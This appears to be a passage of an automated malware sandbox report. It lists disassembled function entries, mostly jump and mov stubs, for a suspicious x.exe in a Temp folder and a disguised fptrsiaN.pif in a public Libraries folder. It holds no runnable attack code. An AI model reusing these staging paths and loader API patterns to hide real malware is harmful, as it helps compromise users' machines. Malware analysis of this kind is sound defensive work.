          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029C534C GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,1_2_029C534C
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]6_2_1B497AC0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]6_2_1B494C9C
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h6_2_1CF7DB68
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2008F2B5h6_2_2008F0C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2008FC3Fh6_2_2008F0C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2008E0C5h6_2_2008E114
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_2008E5E8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_2008EC1B
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_2008EDFB
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2008E0C5h6_2_2008DF07
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114B841h6_2_2114B598
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21141868h6_2_21141448
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211410F1h6_2_21140E40
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114E3B1h6_2_2114E108
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114E809h6_2_2114E560
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114EC61h6_2_2114E9B8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114BC99h6_2_2114B9F0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114D6A9h6_2_2114D400
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21141868h6_2_21141439
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114DB01h6_2_2114D858
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114DF59h6_2_2114DCB0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114FDC1h6_2_2114FB18
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114CDF9h6_2_2114CB50
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21141868h6_2_21141796
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114D251h6_2_2114CFA8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114F0B9h6_2_2114EE10
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114C0F1h6_2_2114BE48
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114F511h6_2_2114F268
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114C549h6_2_2114C2A0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114F969h6_2_2114F6C0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2114C9A1h6_2_2114C6F8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115BC76h6_2_2115B9A8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211568FDh6_2_211565C0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21157DC0h6_2_21157AF0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21155FB9h6_2_21155D10
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21153BC1h6_2_21153918
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115B7E6h6_2_2115B518
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115D7D6h6_2_2115D508
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115CA26h6_2_2115C758
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21150FF1h6_2_21150D48
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115EA16h6_2_2115E748
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21154019h6_2_21153D70
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115701Ah6_2_21156F70
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115701Ah6_2_21156F69
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115AA36h6_2_2115A768
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21156411h6_2_21156168
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115DC66h6_2_2115D998
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115FC56h6_2_2115F988
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21151449h6_2_211511A0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then mov esp, ebp6_2_21159BAA
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115EEA6h6_2_2115EBD8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21154471h6_2_211541C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115AEC6h6_2_2115ABF8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211518A1h6_2_211515F8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115CEB6h6_2_2115CBE8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115C106h6_2_2115BE38
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211548C9h6_2_21154620
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115E0F6h6_2_2115DE28
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21151CF9h6_2_21151A50
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211502E9h6_2_21150040
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115D346h6_2_2115D078
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21154D21h6_2_21154A78
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21155709h6_2_21155460
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21153311h6_2_21153068
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115F336h6_2_2115F068
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21150741h6_2_21150498
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115B356h6_2_2115B088
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115E586h6_2_2115E2B8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21155B61h6_2_211558B8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21152151h6_2_21151EA8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115517Bh6_2_21154ED0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115A5A6h6_2_2115A2D8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21153769h6_2_211534C0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115C596h6_2_2115C2C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21150B99h6_2_211508F0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 2115F7C6h6_2_2115F4F8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C5730h6_2_211C5438
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C9090h6_2_211C8D98
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C2BE6h6_2_211C2918
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CDD10h6_2_211CDA18
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CB208h6_2_211CAF10
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C4BD6h6_2_211C4908
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C8700h6_2_211C8408
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C5BF8h6_2_211C5900
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CF4F9h6_2_211CF200
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C3506h6_2_211C3238
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CF030h6_2_211CED38
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CC528h6_2_211CC230
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C9A20h6_2_211C9728
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C6F18h6_2_211C6C20
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C3E26h6_2_211C3B58
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C6A50h6_2_211C6758
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CD848h6_2_211CD550
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C1516h6_2_211C1248
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CAD40h6_2_211CAA48
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C030Eh6_2_211C0040
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C8238h6_2_211C7F40
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C4746h6_2_211C4478
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C7D70h6_2_211C7A78
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CEB68h6_2_211CE870
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C1E36h6_2_211C1B68
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CC060h6_2_211CBD68
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C0C07h6_2_211C0960
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C9558h6_2_211C9260
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C5107h6_2_211C4D98
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C6588h6_2_211C6290
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C2756h6_2_211C2488
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CD380h6_2_211CD088
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CA878h6_2_211CA580
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C1086h6_2_211C0DB8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CA3B0h6_2_211CA0B8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C78A8h6_2_211C75B0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C3076h6_2_211C2DA8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CE6A0h6_2_211CE3A8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CBB98h6_2_211CB8A0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C19A6h6_2_211C16D8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CB6D0h6_2_211CB3D8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C079Eh6_2_211C04D0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C8BC8h6_2_211C88D0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C3997h6_2_211C36C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C60C0h6_2_211C5DC8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CF9C0h6_2_211CF6C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CCEB8h6_2_211CCBC0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C22C6h6_2_211C1FF8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CC9F0h6_2_211CC6F8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C9EE8h6_2_211C9BF0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C42B6h6_2_211C3FE8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211C73E0h6_2_211C70E8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 211CE1D8h6_2_211CDEE0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21201190h6_2_21200E98
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21200800h6_2_21200508
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21200CC8h6_2_212009D0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 21200338h6_2_21200040
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_21220006
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_21220040
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_21220356
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then push 00000000h6_2_212247AF
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 24A3F2B5h10_2_24A3F0C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 24A3FC3Fh10_2_24A3F0C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_24A3E5E8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 24A3E0C5h10_2_24A3E114
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_24A3EC1B
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_24A3EDFB
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 24A3E0C5h10_2_24A3DF07
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFD6A9h10_2_25BFD400
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BF1868h10_2_25BF1448
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BF10F1h10_2_25BF0E40
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFEC61h10_2_25BFE9B8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFB841h10_2_25BFB598
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFBC99h10_2_25BFB9F0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFE3B1h10_2_25BFE108
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFE809h10_2_25BFE560
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFDF59h10_2_25BFDCB0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BF1868h10_2_25BF1439
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFDB01h10_2_25BFD858
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFD251h10_2_25BFCFA8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BF1868h10_2_25BF1796
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFFDC1h10_2_25BFFB18
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFCDF9h10_2_25BFCB50
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFC549h10_2_25BFC2A0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFC9A1h10_2_25BFC6F8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFF969h10_2_25BFF6C0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFF0B9h10_2_25BFEE10
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFF511h10_2_25BFF268
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25BFC0F1h10_2_25BFBE48
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C068FDh10_2_25C065C0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C07DC0h10_2_25C07AF0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0D346h10_2_25C0D078
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C04471h10_2_25C041C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0EEA6h10_2_25C0EBD8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0CEB6h10_2_25C0CBE8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0AEC6h10_2_25C0ABF8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C018A1h10_2_25C015F8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0FC56h10_2_25C0F988
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0DC66h10_2_25C0D998
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C01449h10_2_25C011A0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0BC76h10_2_25C0B9A8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then mov esp, ebp10_2_25C09BAA
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C00FF1h10_2_25C00D48
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0EA16h10_2_25C0E748
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0CA26h10_2_25C0C758
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0AA36h10_2_25C0A768
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C06411h10_2_25C06168
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0701Ah10_2_25C06F69
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C04019h10_2_25C03D70
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0701Ah10_2_25C06F70
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0D7D6h10_2_25C0D508
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C05FB9h10_2_25C05D10
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C03BC1h10_2_25C03918
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0B7E6h10_2_25C0B518
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C03769h10_2_25C034C0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0C596h10_2_25C0C2C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0517Bh10_2_25C04ED0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0A5A6h10_2_25C0A2D8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C00B99h10_2_25C008F0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0F7C6h10_2_25C0F4F8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0B356h10_2_25C0B088
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C00741h10_2_25C00498
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C02151h10_2_25C01EA8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0E586h10_2_25C0E2B8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C05B61h10_2_25C058B8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C002E9h10_2_25C00040
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C01CF9h10_2_25C01A50
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C05709h10_2_25C05460
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C03311h10_2_25C03068
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0F336h10_2_25C0F068
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C04D21h10_2_25C04A78
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C048C9h10_2_25C04620
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0E0F6h10_2_25C0DE28
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C0C106h10_2_25C0BE38
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7E1D8h10_2_25C7DEE0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C75730h10_2_25C75438
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7CEB8h10_2_25C7CBC0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C73997h10_2_25C736C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C760C0h10_2_25C75DC8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7F9C0h10_2_25C7F6C8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7079Eh10_2_25C704D0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C78BC8h10_2_25C788D0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C719A6h10_2_25C716D8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7B6D0h10_2_25C7B3D8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C742B6h10_2_25C73FE8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C773E0h10_2_25C770E8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C79EE8h10_2_25C79BF0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C722C6h10_2_25C71FF8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7C9F0h10_2_25C7C6F8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7A878h10_2_25C7A580
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C72756h10_2_25C72488
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7D380h10_2_25C7D088
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C76588h10_2_25C76290
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C75107h10_2_25C74D98
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C79090h10_2_25C78D98
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7BB98h10_2_25C7B8A0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C73076h10_2_25C72DA8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7E6A0h10_2_25C7E3A8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C778A8h10_2_25C775B0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C71086h10_2_25C70DB8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7A3B0h10_2_25C7A0B8
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7030Eh10_2_25C70040
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C78238h10_2_25C77F40
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C71516h10_2_25C71248
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7AD40h10_2_25C7AA48
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7D848h10_2_25C7D550
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C73E26h10_2_25C73B58
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C76A50h10_2_25C76758
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C70C07h10_2_25C70960
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C79558h10_2_25C79260
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C71E36h10_2_25C71B68
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7C060h10_2_25C7BD68
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7EB68h10_2_25C7E870
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C74746h10_2_25C74478
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C77D70h10_2_25C77A78
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C75BF8h10_2_25C75900
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7F4F9h10_2_25C7F200
